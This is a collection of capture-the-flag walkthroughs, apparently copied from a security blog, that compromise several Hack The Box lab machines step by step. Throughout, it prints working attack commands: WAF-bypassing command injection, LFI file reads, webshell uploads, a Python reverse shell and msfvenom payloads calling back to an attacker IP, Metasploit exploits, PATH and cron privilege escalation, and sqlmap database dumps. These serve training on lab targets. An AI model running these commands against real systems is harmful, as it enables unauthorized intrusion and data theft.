2 curl "http://10.10.10.69/sync?opt=' id'"
3 curl "http://10.10.10.69/sync?opt=' u'n'ame -a' "
Superb!! It was great to know that we have bypassed WAF successfully, but still the

Walkthroughs 3 Page 170

 Superb!! It was great to know that we have bypassed WAF successfully, but still the
task is not completed yet.

Let’s seize the user.txt and root.txt file and finished this task. Hhhhhh!!!! Believe me,
still, it is not easy to bypass WAF even if your goal is near. Seriously we put great
efforts and at last found user.txt when executed below commands.
1 curl "http://10.10.10.69/sync?opt=' l's' /home'"
2 curl "http://10.10.10.69/sync?opt=' l's' /home/Fl'uxC'apa'cit'orI'n'c'"
3 curl "http://10.10.10.69/sync?opt=' c'at' /home/Fl'uxC'apa'cit'orI'n'c/u'ser'.'txt''"

Now the goal was root.txt file and taking a lesson from the previous experience I choose
to run sudo -l command to check the sudo privileges of the current user.
1 curl "http://10.10.10.69/sync?opt=' sudo -l'"

Awesome!! It told us that we can run a script “monit” with root privileges without using
password, which is inside /home/themiddle/ directory. Let’s open it with the help of cat
command.
1 curl "http://10.10.10.69/sync?opt=' c'at' /h'ome/themiddle/.monit''"
After reading .monit file, we concluded that the script takes two parameter i.e. cmd
string and base64 decoding which will match the conditions according to it and passes
the final result to bash -c as parameter.

Walkthroughs 3 Page 171

Hence it was clear that 1st parameter will match string “cmd” and 2nd will decode
base64 value for that reason first we generated base64 value for /root/root.txt because
we were well aware of the location of the root.txt file from our previous challenges.
1 echo "cat /root/root.txt" | base64
Now with the help of sudo privilege execute the command to gain root access and
complete the task by grabbing root.txt
1 curl "http://10.10.10.69/sync?opt=' sudo /h'ome/themiddle/.monit' cmd
Y2F0IC9yb290L3Jvb3QudHh0Cg=='"
HURRAYYYY!!! We hit the goal and successfully found the root.txt file.

Author: AArti Singh is a R

From <https://www.hackingarticles.in/hack-the-box-challenge-fluxcapacitor-walkthrough/>

Walkthroughs 3 Page 172

Inception
Wednesday, January 2, 2019 7:16 PM

Level: Hard
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online accessible therefore they have static IP. The IP of Inception
is 10.10.10.67 so let’s start with nmap port enumeration.
1 nmap -A 10.10.10.67
From given below image, you can observe we found port 80 and 3128 are open in
victim’s network.

Knowing port 80 was open on victim’s network we preferred to explore his IP in the
browser and the following image get opened as shown below.

Walkthroughs 3 Page 173

Then we checked its source code and found something “dompdf” which could be a
directory, so let’s go through it.

So when we had explored /dompdf in the browser, it put up some files. I was interested
in version so we opened it and found version 0.6.0

Walkthroughs 3 Page 174

in version so we opened it and found version 0.6.0

After that with help of searchsploit, we got an exploit 33004.txt for dompdf 0.6.0.

In this exploit, you will get an instance for exploiting the target machine with help of LFI.

Walkthroughs 3 Page 175

In this exploit, you will get an instance for exploiting the target machine with help of LFI.

Then without wasting time we look for /etc/passwd file with the help of the following
command:
1 curl http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-
encode/resource=/etc/passwd
But we got an encoded result, therefore, we need to decode it.

Walkthroughs 3 Page 176

From given below image you can observe that we have successfully decoded base 64
data and can read first username Cobb.

Walkthroughs 3 Page 177

And after penetrating very deep, we found default.conf file inside apache which holds
another base64 value, now use given below command for that.
1 http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-
encode/resource=/etc/apache2/sites-enabled/000-default.conf

Walkthroughs 3 Page 178

After decoding above found base64 value, you will get a highlighted path for
authuserfile as shown below in the given image. If you will read the text inside location
tag <location>, you will realize that it is giving hint for login credential
for /webdev_test_inception and more security details such as authentication type:
basic.

Walkthroughs 3 Page 179

Again type the following command:
1 curl http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-
encode/resource=/var/www/html/webdav_test_inception/webdav.passwd
Hmmmmm!!! One more base64 value, let’s decode this also.

Walkthroughs 3 Page 180

So when we had decoded above based 64 value and found a hash value for user
“webdav_tester” from it. Here we had copied it into a text file and now going to use john
the ripper for cracking this hash.

Type following command for cracking hash value with the help of /rockyou.txt
1 john hash --wordlist=/usr/share/wordlists/rockyou.txt
Great!! It gives “babygurl69”

So currently we have our username “webdav_tester” and the password “babygurl69”

for login into / webdev_test_inception and authentication type is also basic therefore we
can use cadaver for uploading backdoor.
Type following command for uploading php backdoor:
1 cadaver http://10.10.10.67/webdav_test_inception
2 webdav_tester
3 babygurl69
4 put /root/Desktop/qsd-php-backdoor.php
While uploading php backdoor we had tried so many types of php backdoor but among
them qsp-php-backdoor.php was working and it is default location is

Walkthroughs 3 Page 181

them qsp-php-backdoor.php was working and it is default location is
/usr/share/webshells/php.

Then we open uploaded php shell in the browser and click on “go to current working
directory”.
1 http://webdav_test_inception/qsd-php-backdoor.php

It brings us into inside /html directory, where we saw wordpress 4.8.3 and opened it.

Walkthroughs 3 Page 182

Then we explore /wp-config.php file and found username “root” and password
“VwPddNh7xMZyDQoByQL4″. We also tried to login to wordpress but it was not active.

Again we came back to the previous page as shown below and type the following

Walkthroughs 3 Page 183

Again we came back to the previous page as shown below and type the following
command inside execute shell text filed for identifying all running services inside the
network.
1 netstat -antp

Here we found ssh is open inside internal network and also observed new interface
192.168.0.10

Walkthroughs 3 Page 184

Since we know port 3128 is open for squid http proxy, so now open /etc/proxy.conf to
add that inside it as shown below in the image.

Now connect to ssh through proxychains by using below command and submit
password that was found from inside /wp-config.php for user cobb.
1 proxychains ssh [email protected]
Nice!!! It works and we logged in successfully, let’s grab the user.txt first as shown.

Walkthroughs 3 Page 185

Then for finding root.txt flag, we need privilege escalation, therefore, type sudo -
l command which will tell you sets permission for user cobb. And you will see that Cobb
has ALL permissions. Then further we execute sudo su and got root access and move
for root.txt file.
Dammitttttttt!!!!! It was a bloody trap, not original root access.

ifconfig tells us IP is 192.168.0.10 and then we ping thought to ping 192.168.0.1, and
the host was up.

Walkthroughs 3 Page 186

Then with help of the following command, we came to know port 21, 22 and 53 was
opened.
1 nc -zv 192.168.0.1 1-65535 &> results && cat results | grep succeeded
We successfully login into ftp by using anonymous: anonymous and run ls
command for looking all directories and files.

Walkthroughs 3 Page 187

Inside /etc we saw three files: passwd, crontab and tftpd-hpa in /default. We
downloaded all three files.
1 cd /etc
2 get passwd
3 get crontab
4 cd default
5 get tftpd-hpa

Walkthroughs 3 Page 188

Then read all three file through cat
1 cat /etc/passwd
2 cat /default/tftpd-hpa

Walkthroughs 3 Page 189

 1 cat crontab
Here we saw something very interested that every 5 minutes apt-update command is
running.

Walkthroughs 3 Page 190

running.

Then we generated ssh key by executing following command:

ssh-keygen

Now enter following commands for uploading public key on 192.168.0.1 using TFTP:
1 cd /root/.ssh
2 tftp 192.168.0.1
3 put id_rsa.pub /root/.ssh/authorized_keys
Since tftp gives all permission to the authorized key which means anyone can read and
write it as result ssh public key get fail due to incorrect permission, it should 600. Now
exit from tftp and change authorized key permission in the current host machine.
1 quit
We were not much sure how to change permission through apt-update command,
therefore, we search in Google and luckily found a link that helps us in generating apt
update command for changing authorized key permission.
1 echo 'APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};' > rootshell
2 tftp 192.168.0.1
3 put rootshell /etc/apt/apt.conf.d/rootshell
4 quit
5 ssh [email protected]
Wait for 5 mins and then you will get root access. After that grab the root.txt flag and Hit
the GOAL!!!

Walkthroughs 3 Page 191

the GOAL!!!

Author: AArti S

From <https://www.hackingarticles.in/hack-the-box-challenge-inception-walkthrough/>

Walkthroughs 3 Page 192

Bashed
Wednesday, January 2, 2019 7:16 PM

Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!
As these labs are only available online, therefore, they have a static IP. Bashed Lab has
IP: 10.10.10.68.
Now, as always let’s begin our hacking with the port enumeration.
1 nmap -A 10.10.10.68

Knowing port 80 was open on victim’s network we preferred to explore his IP in the
browser and the following image opened as shown below.

Walkthroughs 3 Page 193

Next, we use the dirb tool of kali to enumerate the directories and found some important
directories such as /dev

So when you will open /dev directory in the browser, you will get a link

Walkthroughs 3 Page 194

So when you will open /dev directory in the browser, you will get a link
for phpbash.php. Click on that link.

It will redirect to the following page as shown below, which seems like a shell interacting
through the browser.
After that, you can execute any os arbitrary command for testing whether it’s working or
not. We have run ls command to check present list in the current directory.

Inside /html directory we found uploads folder and hence now we can easily
compromise the target’s system by uploading backdoor.

Walkthroughs 3 Page 195

Using msfvenom we had created a malicious shell.php file by executing following
command.
1 msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.28 lport=4444 -f raw
Simultaneously run multi/handler for reverse connection of victim’s system.

We had used Python HTTP server for transferring file, you can also use an alternative
method for transferring and download the malicious file from wget inside uploads
directory.

Walkthroughs 3 Page 196

Now execute the malicious file shell.php from the browser as shown below and move to
metasploit framework for reverse connection.

After executing uploaded backdoor file come back to Metasploit framework and wait for
meterpreter session.
1 msf use exploit/multi/handler
2 msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
3 msf exploit(multi/handler) set lhost 10.10.14.28
4 msf exploit(multi/handler) set lport 4444
5 msf exploit(multi/handler) exploit
From given below image you can observe meterpreter session1 opened for accessing
victim tty shell.
Now let’s finish the task by grabbing user.txt and root.txt file. First I move into /home
directory and check available files and directories inside it.
1 cd home
2 ls
Here one directories arrexel, when I explore /home/arrexel I saw user.txt and use cat
command for reading.
1 cd arrexel
2 ls
3 cat user.txt
Great!! Here we had completed 1st task now move to 2nd task

Walkthroughs 3 Page 197

Great!! Here we had completed 1st task now move to 2nd task

For spawning proper tty shell of target’s system we need to import python file, therefore,
I run following command inside meterpreter shell
1 shell
2 python -c 'import pty;pty.spawn("/bin/bash")'
3 lsb_release -a

Walkthroughs 3 Page 198

Run ls -al command to observe all directories with their permissions. Here you will
notice the user scriptmanager has permission for accessing /scripts directory.

When we tried to open /scripts directory as the default user, it shows Permission Denied
message. Then run sudo -l command which will tell us that the scriptmanager has No
password of all things.
Then we run following command for penetrating scripts folder with help of
scriptmanager
1 sudo -u scriptmanager ls /scripts
2 sudo -u scriptmanager cat /scripts/test.py
3 sudo -u scriptmanager cat /scripts/test.txt
Since we found a python file, therefore, our strategy will be to replace the original
test.py file from malicious python file to have a reverse connection over netcat and for
that, you need to save following code in a text file.
1 import

Walkthroughs 3 Page 199

 1 import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.conne
ct(("10.10.14.28",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Save this file with .py extension and transfer it into victim’s system and start netcat on
listening port.
Note: Replace 10.10.14.28 from inside the code into your VPN IP.

Now download malicious python file inside /tmp

1 wget http://10.10.14.28/root.py
And then copy the root.py from inside /tmp into test.py in /script with the help of
following command.
1 sudo -u scriptmanager cp /tmp/root.py /scripts/test.py

After some time you will get reverse connect at netcat terminal with root access. Now
finished the task by capturing root.txt file as shown below.

Walkthroughs 3 Page 200

finished the task by capturing root.txt file as shown below.
1 nc -lvp 1234
2 id
3 cd /root
4 ls
5 cat root.txt

2nd Method for finding root.txt flag.

We find machine architecture 14.0 in above method. So we start looking for a related
kernel exploit in Google and luckily found an exploit from here for root privilege
escalation.
Copy and paste the whole text inside a text file and save as poc.c

After that compile it with help of the following command:

1 gcc poc.c -o pwn
Run python HTTP server for transferring it into targets system.

Walkthroughs 3 Page 201

Run python HTTP server for transferring it into targets system.

At last, download complied file pwn into target machine from wget inside /dev/shm as
shown in the image then give full permission and run the file.
1 wget http://10.10.14.28/pwn
2 chmod 777 pwn
3 ./pwn
It will give you root access, now catch the root.txt flag as soon as possible because it
will crash the kernel after some time.
1 cd /root
2 cat root.txt
Superb!! We had completed the task and hacked this box.

Walkthroughs 3 Page 202

Superb!! We had completed the task and hacked this box.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an

Information Security Consultan

From <https://www.hackingarticles.in/hack-the-box-challenge-bashed-walkthrough/>

Walkthroughs 3 Page 203

Kortak
Wednesday, January 2, 2019 7:16 PM

Level: Hard
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.55 so let’s
begin with nmap port enumeration.
1 nmap -p- -A 10.10.10.55 --open
From given below image, you can observe we found port 22, 8009, 8080, 60000 are open in victim’s
network.

Walkthroughs 3 Page 204

As port 8080 and 60000 are running HTTP, we open the IP in our browser and access the page through
port 8080. As soon as we open the ip in our browser we get a tomcat authentication prompt asking for
username and password.

Walkthroughs 3 Page 205

When we access the target machine through port 60000, we find a page that is hosted on the machine
can be used to access the internet.

Now we need to use the dirb tool to enumerate the directories of the target machine.
1 dirb http://10.10.10.55:60000/
From given below image you can observe the highlighted directory that is put up by dirb in its output
result.

Walkthroughs 3 Page 206

We now try to check if the page is vulnerable to SSRF or not by trying to access a forbidden page on the
target machine.

when we open server-status through the vulnerable page, we are able to access the forbidden content.
We then find that port 888 is listening locally on the target machine.

Walkthroughs 3 Page 207

We then find that port 888 is listening locally on the target machine.

Then we opened http://localhost:888 through URL and it contains a few links to different files.

We open backup and find that it was empty.

Walkthroughs 3 Page 208

We open backup and find that it was empty.

To gain further information we used curl to access the page and find that it is an XML file that contains a
username and password.
1 curl http://10.10.10.55:60000/url.php?path=localhost:888/?doc=backup

Walkthroughs 3 Page 209

We use the above credentials to login into tomcat manager application that is hosted on port 8080.

Walkthroughs 3 Page 210

We use the above credentials to login into tomcat manager application that is hosted on port 8080.

As we were able the right credentials for tomcat server, we found that it was vulnerable to this
exploit here. We used metasploit to exploit this vulnerability.
1 msf > use exploit/multi/http/tomcat_mgr_upload
2 msf exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.55
3 msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
4 msf exploit(multi/http/tomcat_mgr_upload) > set httpusername admin
5 msf exploit(multi/http/tomcat_mgr_upload) > set httppassword 3@g01PdhB!
6 msf exploit(multi/http/tomcat_mgr_upload) > exploit
Finally, we got the meterpreter session as shown in the below image

After gaining the reverse shell we start enumerating the target system.
In /home/tomcat/to_archive/pentest_data we find a few interesting files.

Walkthroughs 3 Page 211

In /home/tomcat/to_archive/pentest_data we find a few interesting files.

In /home/tomcat/to_archive/Pentest_data we find a directory information tree file and binary file.

We download both the files into our system

We used impacket-secretsdump to dump hashes inside the files.

Walkthroughs 3 Page 212

We used impacket-secretsdump to dump hashes inside the files.

We were able to crack one of the hashes and find it to be f16tomcat!

We use this to login as atanas, we then move into /root/ folder and find a file called flag.txt. When we
open it we find that it was a dummy flag file.

Walkthroughs 3 Page 213

open it we find that it was a dummy flag file.

In the root directory, we also find a log file when we take a look at the content of the file we find that it
contains log that we were created using wget. We also find that the wget version used is 1.16

Searching on the Exploit-DB site we find that this version of wget was vulnerable to remote code
execution.

Walkthroughs 3 Page 214

We follow the instructions given on exploit-db.com about how to exploit this vulnerability.

Then we had opened the wgetrc file through vim for changing the path of Post_file from /etc/shadow
into /root/root.txt

Walkthroughs 3 Page 215

We download the code of this exploit from exploit-db.com and upload it to the target machine through
meterpreter.

We then give read, write and execute permission to the file.

We then use authbind to run the file, as authbind allows a program to that would normally
require super user privileges to access privileged network services to run as a non-privileged user. As
soon as we run the exploit we get the root flag.

Walkthroughs 3 Page 216

 soon as we run the exploit we get the root flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast.
Contact Here
Share this:
• Click to share on Twitter (Opens in new window)
• Click to share on Facebook (Opens in new window)
• Click to share on Google+ (Opens in new window)
Like this:
Loading...
ABOUT THE AUTHOR

RAJ CHANDEL
Raj Chandel is a Skilled and Passionate IT Professional especially in IT-Hacking Industry. At present other than his
name he can also be called as An Ethical Hacker, A Cyber Security Expert, A Penetration Tester. With years of
quality Experience in IT and software industry
PREVIOUS POST
← HACK THE BOX CHALLENGE LAZY WALKTHROUGH
NEXT POST

Walkthroughs 3 Page 217

 NEXT POST
HACK THE BOX CHALLENGE BASHED WALKTHROUGH →
Leave a Reply
Your email address will not be published. Required fields are marked *
Comment
Name *
Email *
Website
Notify me of follow-up comments by email.
Notify me of new posts by email.
Search
Subscribe to Blog via Email
Email Address

From <https://www.hackingarticles.in/hack-the-box-challenge-kotarak-walkthrough/>

Walkthroughs 3 Page 218

Lazy
Wednesday, January 2, 2019 7:16 PM

Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!
As these labs are only available online, therefore, they have a static IP. Lazy Lab has
IP: 10.10.10.18.
Now, as always let’s begin our hacking with the port enumeration.
1 nmap -A 10.10.10.18
As you can see in the given screenshot that we have two services running on our
Target Machine, ssh and HTTP on ports 22 and 80 respectively.

The Port 80 is open so let’s open IP in out Browser to see that if a website is hosted on
the IP. After opening the IP in the browser, we were greeted by a simple page with
Register and Login Links. Clicking on the Register opens up a form.

Walkthroughs 3 Page 219

Register and Login Links. Clicking on the Register opens up a form.

Then I decided to register as admin: 123 for username and password respectively.

But I got an alert “Duplicate entry ‘admin’ for key PRIMARY”, also received error “can’t
create user: user exists” when I registered as admin. Hence username “admin” is
already registered, now we though to crack the password for login but that was quite
tough to crack.

Walkthroughs 3 Page 220

tough to crack.

At last, I decide to use burp suite for capturing browser request. Here I simply register
with aadmin as username and password 123.

And got intercepted request, here I saw auth cookie. Then I send the intercept request
to the repeater for analyses its response. It gave a hint “invalid padding” which means
there could be padding oracle vulnerability. To know more about what is padding oracle

Walkthroughs 3 Page 221

there could be padding oracle vulnerability. To know more about what is padding oracle
vulnerability read our previous article from here. Since I had already faced such
situation in my past experience, therefore, I know what to do next.

Next open terminal to run the command shown in the given image which contains target
URL and above-copied auth cookie

Further type 2 where it asked ID recommended

Last part of screenshot has captured three decrypt values in base64, HEX and ASCII.
The cookie of auth is a combination of username with its password from padbuster we
come to know what is the encrypted value of username for admin.

Walkthroughs 3 Page 222

We are very near to our goal just encrypt this auth cookie with the user as admin once
again. Here we have our plaintext as admin and let’s encode it using padbuster.

Walkthroughs 3 Page 223

again. Here we have our plaintext as admin and let’s encode it using padbuster.

Further type 2 where it asked ID recommended. Here the highlighted part is our
encrypted value for admin. Copy It “BAit——–AAAA”.

Walkthroughs 3 Page 224

Now replace the original auth cookie from the encrypted value which you have copied
above and forwarded the intercepted request.

Walkthroughs 3 Page 225

above and forwarded the intercepted request.

When request sent by burp suite, automatically on the web server you will get logged in
as an admin account. After that when you will access the admin page you will get a URL
“my key” that offers us with a username mitsos and an ssh key.

So as you can observe that we had opened the ssh key let’s save it into a text file as
“key” on the desktop and if you notice the URL can read ssh login username mitsos.

Walkthroughs 3 Page 226

“key” on the desktop and if you notice the URL can read ssh login username mitsos.

First, let’s download the key and then give appropriate permission using the chmod.
Now that we have the ssh username and key let’s get an ssh session.
1 ssh -i key [email protected]
After successfully accessing PTY shell of a victim system, a simple ‘ls’ command shown
us that we have the user.txt. Congrats we got our user flag.

Now, let’s work on the root flag.

As we saw in the screenshot above that we the peda and backup folder too. We tried
working around it but nothing useful seems to come up. On running the executable
backup we saw that it prints the shadow file with user hashes. So we ran the strings
command and found that it does contain command “cat /etc/shadow”

Walkthroughs 3 Page 227

command and found that it does contain command “cat /etc/shadow”

Now, all we needed to do was to create a personalized executable cat file, which can be
done as shown in below image. Here we are reprogramming cat to give us the shell, on
execution.
1 cd /tmp
2 echo "/bin/sh" > cat
3 chmod 777 cat
4 export PATH=/tmp:$PATH
5 cd
6 ls
7 ./backup
When you will execute the backup to see if we get the shell. Great! We have the root
shell.

Now all left is to get to the root directory and get the flag. But remember we have the
$PATH changed so to run the cat command we will have to specify the location.
/bin/cat root.txt.
Great!! We got our root flag successfully
And this way, we successfully solved our challenge. YAY!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an

Information Security Consultant Soc

From <https://www.hackingarticles.in/hack-the-box-challenge-lazy-walkthrough/>

Walkthroughs 3 Page 228

Optimum
Wednesday, January 2, 2019 7:16 PM

Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online, therefore they have static IP. The IP of optimum
is 10.10.10.8 so let’s start with nmap port enumeration.
1 nmap -A 10.10.10.8
From given below image, you can observe that we found ports 80 is open for file
sharing using HFS 2.3 in victim’s network.

When I Googled relative exploit I found first link for Metasploit exploit.

Then run msfconsole command in terminal and load metasploit framework to use the

Walkthroughs 3 Page 229

Then run msfconsole command in terminal and load metasploit framework to use the
said exploit and for that type the following commands :
1 use exploit/windows/http/rejetto_hfs_exec
2 msf exploit(windows/http/rejetto_hfs_exec) >set payload
3 windows/x64/meterpreter/reverse_tcp
4 msf exploit(windows/http/rejetto_hfs_exec) >set rhost 10.10.10.8
5 msf exploit(windows/http/rejetto_hfs_exec) >set lhost 10.10.14.6
6 msf exploit(windows/http/rejetto_hfs_exec) >set svrhost 10.10.14.6
msf exploit(windows/http/rejetto_hfs_exec) >exploit
And when it works perfectly, you will get a meterpreter session 1 as shown below and
by running sysinfocommand you will know about the victim’s system information.

Now let’s complete this task by searching user.txt and root.txt flag which is hidden
somewhere inside its directories.
Inside c:\Document and Setting \kostas\Desktop I found the user.txt file and used
the cat command to read this file.
cat user.txt.txt
Great!! We got our 1st flag successfully

Walkthroughs 3 Page 230

Great!! We got our 1st flag successfully

To get root flag I really struggle a lot, all privilege escalation exploit suggested by
recon/local_exploit_suggester did not work when I tried them. Then I took help from
Google and searched for exploit related to windows server and found many exploits,
“MS16-098 exploit 41020” was among them. I simply downloaded this exe file and
applied manual privilege escalation.

After downloading exe file from Google, I transferred it to target’s machine via
meterperter session; with help of following commands:
1 Meterpreter> upload /root/Desktop/41020.exe .
2 Meterpreter> shell
Then after executing whoami command, it assured me “nt authority\system”

Walkthroughs 3 Page 231

Then after executing whoami command, it assured me “nt authority\system”

Inside c:\Document and Setting \Administrator\Desktop I found the root.txt file and
used the type command to read the file.
type root.txt
Great!! We got our 2nd flag successfully
And this way, we successfully solved our challenge. YAY!

Author: Yas

From <https://www.hackingarticles.in/hack-the-box-challenge-optimum-walkthrough/>

Walkthroughs 3 Page 232

Brainfuck
Wednesday, January 2, 2019 7:16 PM

Walkthroughs 3 Page 233

Europa
Wednesday, January 2, 2019 7:17 PM

Level: Hard
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense
is 10.10.10.22 so let’s begin with nmap port enumeration.
1 nmap -A 10.10.10.22
From given below image, you can observe we found port 22, 80 and 443 are open in
victim’s network.

As you have seen in our all previous lab that we love to explore target IP via port 80 on
our web browser, similarly we follow that tradition in this also but Bad Unluckily!! This
time it didn’t work at all.

Walkthroughs 3 Page 234

Now the last option was to add target IP inside /etc/host file since port 443 was open
containing two domain names and as it is a challenge of hack the box thus I
edit europacorp.htb and admin-portal.europccorp.htb as a hostname.

Then I explore domain name: admin-portal.europccorp.htb through the web browser

and found following login page as shown below.

Walkthroughs 3 Page 235

In order breach confidentiality we can try SQL form based attack and for this, I preferred
sqlmap following command to enumerate database name.
1 sqlmap -u https://admin-portal.europacorp.htb --form --dbs --batch

Luckily our assumption set true and it dumbs the database name “admin”.

Then I run following command for enumerating entire table details.

1 sqlmap -u https://admin-portal.europacorp.htb -D admin --dump-all --batch

Awesome!! I found a table “users” which 2 entries having the username and password
columns.

Walkthroughs 3 Page 236

columns.

Using online MD5 decryption I cracked hash password and received

“SupersecretPassword!” and use these credential to login into admin console.

After fruitfully validation I got dashboard from where I step towards Tools options.

It was set up with a script for open VPN generator using the PHP function
preg_replace() on user input. When I investigate more related to this function, it is

Walkthroughs 3 Page 237

preg_replace() on user input. When I investigate more related to this function, it is
suggested not to use preg_replace() on user input as it can lead to command execution
vulnerability.
Considering above suggestion true, I fetched its request into burp suite and sent it to the
repeater for exploit command injection vulnerability.

Here I notice three parameter pattern, ipaddress, and test where we can add our
arbitrary code for execution but before that, you need to know correct step “how to
exploit it” manually.

Walkthroughs 3 Page 238

exploit it” manually.

So when I search more related to this then I found so many links which was
describing /e option is a threat to PHP preg_replace function.

Now the code can be execute by sending http post request as given below format.
pattern=/ip_address/e&ipaddress=arbitrary command&text=ip_addres
For example: To check directory list we can run following command and verify
resultant output.
pattern=/ip_address/e&ipaddress=ls &text=ip_addres
Similarly we can run any malicious code inside this for achieving reversion connection.

Walkthroughs 3 Page 239

Using msfvenom following command we had generated malicious bash code for getting
a reverse connection from victim’s machine at our listening port.
1 msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.6 lport=1234 R
As shown in below image, the size of the generated payload is 101 bytes, now copy this
malicious code and send it to target. After that start Netcat/multi handler for accessing
reverse connection and wait for getting its TTY shell.

Now if you will run above-copied code then it will get failed in its mission therefore
before running the ordinal code you need to encode it in URL encoding format and
then copy the URL encoded code for execution.

Walkthroughs 3 Page 240

then copy the URL encoded code for execution.

Now I had pasted above-encoded code as shown in below image and execute it with
GO tab.

Meanwhile, I return to my Metasploit terminal and wait for the metepreter session by
exploiting multi handler.
1 msf use exploit/multi/handler
2 msf exploit(multi/handler) set payload cmd/unix/reverse_netcat
3 msf exploit(multi/handler) set lhost 10.10.14.6
4 msf exploit(multi/handler) set lport 1234

Walkthroughs 3 Page 241

4 msf exploit(multi/handler) set lport 1234
5 msf exploit(multi/handler) exploit
From given below image you can observe command session1 opened for accessing
victim tty shell then I upgrade command shell into a meterpreter session.

Pleasing!! We have bound the shell of victims system, now let’s finish the task by
grabbing user.txt and root.txt file and after traversing some directory I found the user.txt
file in /home/john
1 Meterpreter>sysinfo
2 Meterpreter>cd home
3 Meterpreter>cd john
4 Meterpreter>cat user.txt
Great!! Here we had completed 1st task now move to 2nd tasK

Walkthroughs 3 Page 242

Great!! Here we had completed 1st task now move to 2nd tasK

We start penetrating targets machine and after some time we came know about
the clearlog file which has root privilege from inside contents of crontab file.
Using cat command we read contents of clearlogs here the cronjob was executing the
shell script logcleared.sh with root permission.
1 Meterpreter>cat /etc/crontab
2 Meterpreter>cat /var/www/cronjaobs/clearlogs

Walkthroughs 3 Page 243

Then we move into cmd directory and for spawning proper tty shell of target’s system
we need to import python3 file, therefore, I run following command inside the
meterpreter shell

This time again we had used same payload cmd/unix/reverse_netcat generated

malicious as above on a new port 5678 for reverse connection and copied the
generated code and start netcat on a new terminal for getting the reverse connection.

Then edit the above malicious code into logcleared.sh file with help of echo command
and gave full permission as shown below.

Walkthroughs 3 Page 244

and gave full permission as shown below.

1 nc -lvp 5678
WOW, we got the reverse connection from victims system with root access now let’s
catch the flag and finished the task.
id
cd /root
cat flag.txt
Finally, we have completed both tasks successfully and get juice experience.

Autho

From <https://www.hackingarticles.in/hack-the-box-challenge-europa-walkthrough/>

Walkthroughs 3 Page 245